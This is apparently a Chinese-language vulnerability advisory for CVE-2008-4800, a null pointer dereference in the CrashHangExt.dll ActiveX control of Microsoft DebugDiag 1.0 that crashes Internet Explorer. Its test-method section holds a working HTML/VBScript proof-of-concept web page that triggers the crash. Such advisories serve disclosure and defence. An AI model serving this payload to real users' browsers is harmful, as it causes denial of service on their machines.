发布日期：2008-10-30
更新日期：2008-10-31

受影响系统：

Microsoft DebugDiag 1.0

描述：

---

BUGTRAQ  ID: 31996
CVE(CAN) ID: CVE-2008-4800

调试诊断工具（DebugDiag）用于排除Win32用户态进程中挂起、内存泄露或崩溃等故障。

DebugDiag所提供的CrashHangExt.dll没有正确地验证某些输入参数，如果用户受骗访问了恶意网页的话，就会在使用该控件的应用（通常为IE）中触发空指针引用，导致拒绝服务的情况。

<*来源：suN8Hclf （crimson.loyd@gmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=122539295806764&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<body>
<object classid='clsid:7233D6F8-AD31-440F-BAF0-9E7A292A53DA' id='target' />
</object>
<script language='vbscript'>
arg1=-2147483647

target.GetEntryPointForThread arg1
</script>
</body>

建议：

---

厂商补丁：

Microsoft
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.microsoft.com/technet/security/

浏览次数：3203
严重程度：0（网友投票）